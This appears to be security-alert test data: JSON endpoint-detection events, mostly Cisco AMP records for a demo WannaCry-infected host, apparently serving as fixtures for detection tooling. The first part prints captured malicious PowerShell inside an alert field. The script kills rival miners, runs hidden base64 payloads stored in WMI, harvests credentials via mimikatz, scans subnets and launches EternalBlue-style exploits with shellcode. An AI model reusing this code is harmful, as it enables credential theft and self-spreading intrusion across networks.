                 i f   ( ( $ p s i d s [ 0 ]   - e q   $ l i n e [ - 1 ] )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ t . c o n t a i n s ( " : 8 0   " )   - o r   $ t . c o n t a i n s ( " : 1 4 4 4 4 " ) )   )  
                 {  
                         $ e x i s t = $ t r u e  
                         b r e a k  
                 }  
         }  
 }  
 K i l l B o t ( ' c o r e d p u s s v r ' )  
 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
                 i f   ( ( $ l i n e [ - 3 ]   - n e   $ n u l l )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 1 1 1 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 2 2 2 2 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 3 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 4 4 4 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 5 5 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 6 6 6 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 7 7 7 7 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 8 8 8 8 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 9 9 9 9 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 4 4 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 5 5 6 0 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 5 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 3 3 5 " ) ) )  
                 {  
                         $ e v i d = $ l i n e [ - 1 ]  
                         G e t - P r o c e s s   - i d   $ e v i d   |   s t o p - p r o c e s s   - f o r c e  
                 }  
         }  
 i f   ( ! $ e x i s t   - a n d   ( $ p s i d s . c o u n t   - l e   8 ) )  
 {        
         $ c m d m o n = " p o w e r s h e l l   - N o P   - N o n I   - W   H i d d e n   ` " ` $ m o n   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m o n ' ] . V a l u e ; ` $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e   ; i e x   ( [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( ` $ f u n s ) ) ) ; I n v o k e - C o m m a n d     - S c r i p t B l o c k   ` $ R e m o t e S c r i p t B l o c k   - A r g u m e n t L i s t   @ ( ` $ m o n ,   ` $ m o n ,   ' V o i d ' ,   0 ,   ' ' ,   ' ' ) ` " "  
         $ v b s   =   N e w - O b j e c t   - C o m O b j e c t   W S c r i p t . S h e l l  
 	 $ v b s . r u n ( $ c m d m o n , 0 )      
 }  
  
 $ N T L M = $ F a l s e  
 $ m i m i   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m i m i ' ] . V a l u e    
 $ a ,   $ N T L M =   G e t - c r e d s   $ m i m i   $ m i m i  
                
 $ N e t w o r k s   =   G e t - W m i O b j e c t   W i n 3 2 _ N e t w o r k A d a p t e r C o n f i g u r a t i o n   - E A   S t o p   |   ?   { $ _ . I P E n a b l e d }          
 $ i p s u   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i p s u ' ] . V a l u e    
 $ i 1 7   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i 1 7 ' ] . V a l u e  
 $ s c b a =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' s c ' ] . V a l u e  
 [ b y t e [ ] ] $ s c = [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ s c b a )            
 f o r e a c h   ( $ N e t w o r k   i n   $ N e t w o r k s )    
 {                          
          
         $ I P A d d r e s s     =   $ N e t w o r k . I p A d d r e s s [ 0 ]      
 	 i f   ( $ I P A d d r e s s   - m a t c h   ' ^ 1 6 9 . 2 5 4 ' ) { c o n t i n u e }   	  
         $ S u b n e t M a s k     =   $ N e t w o r k . I P S u b n e t [ 0 ]      
         $ i p s = G e t - N e t w o r k R a n g e   $ I P A d d r e s s   $ S u b n e t M a s k  
 	 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 	 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
 	 	 i f   ( $ l i n e . c o u n t   - l e   4 ) { c o n t i n u e }  
 	 	 $ i = $ l i n e [ - 3 ] . s p l i t ( ' : ' ) [ 0 ]  
                 i f   (   ( $ l i n e [ - 2 ]   - e q   ' E S T A B L I S H E D ' )   - a n d     ( $ i   - n e   ' 1 2 7 . 0 . 0 . 1 ' )   - a n d   ( $ i p s   - n o t c o n t a i n s   $ i ) )  
                 {  
                         $ i p s + = $ i  
                 }  
         }  
         i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
         f o r e a c h   ( $ i p   i n   $ i p s )  
         {        
                 i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
                 i f   ( $ i p   - e q   $ I P A d d r e s s ) { c o n t i n u e }            
                 i f   ( ( T e s t - C o n n e c t i o n   $ i p   - c o u n t   1 )   - n e   $ n u l l     - a n d   $ i p s u   - n o t c o n t a i n s   $ i p )    
                 {        
                         $ r e = 0  
                         i f   ( $ a . c o u n t   - n e   0 )              
                         { $ r e   =   t e s t - i p   - i p   $ i p   - c r e d s   $ a     - n i c   $ n i c   - n t l m   $ N T L M   }  
                         i f   ( $ r e   - e q   1 ) { $ i p s u   = $ i p s u   + "   " + $ i p }  
 	 	 	 e l s e  
 	 	 	 {  
 	 	 	 	 $ v u l = [ P i n g C a s t l e . S c a n n e r s . m 1 7 s c ] : : S c a n ( $ i p ) 	 	 	 	  
 	 	 	 	 i f   ( $ v u l   - a n d   $ i 1 7   - n o t c o n t a i n s   $ i p )  
  
 	 	 	 	 {  
 	 	 	 	 	 $ r e s = e b 7   $ i p   $ s c  
 	 	 	 	 	 i f   ( ! ( $ r e s   - e q   $ t r u e ) )  
 	 	 	 	 	 { e b 8   $ i p   $ s c }  
 	 	 	 	 	 $ i 1 7   =   $ i 1 7   +   "   " + $ i p  
 	 	 	 	 }  
 	 	 	 }  
                 }  
         }  
   }                
 $ S t a t i c C l a s s = N e w - O b j e c t   M a n a g e m e n t . M a n a g e m e n t C l a s s ( ' r o o t \ d e f a u l t : c o r e d p u s s v r ' )      
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i p s u '   , $ i p s u )  
 $ S t a t i c C l a s s . P u t ( )  
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i 1 7 '   , $ i 1 7 )  
 $ S t a t i c C l a s s . P u t ( ) ","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20200719101800,"sig_rev":1},"detection":"apde:20200719101800","end_ts":1610640884,"engine":"apde","id":"cF3A8bacac","name":"PowerShell Download String","observables":{"file":[{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1},{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. 
All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1}]},"remediated":false,"severity":"medium","silent":true,"start_ts":1610640884,"tactics":["TA0002","TA0005"],"techniques":["T1059"],"type":"activity","normalized":{"observables":{"file":{"name":["wmiprvse.exe","powershell.exe"],"path":["c:\\windows\\system32\\wbem","c:\\windows\\system32\\windowspowershell\\v1.0"]}},"name":"powershell download string"},"ts":1610640884},"tactics":["TA0002","TA0005"],"techniques":["T1059"]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419247189909831755","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419247189909831754","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419247189909831753","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":732000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":717000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":639000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831755","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831754","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":873000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831753","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qeriuwjhrf","file_path":"\\\\?\\C:\\Windows\\qeriuwjhrf","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":732000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":717000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":639000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":994000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412604589194870787","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
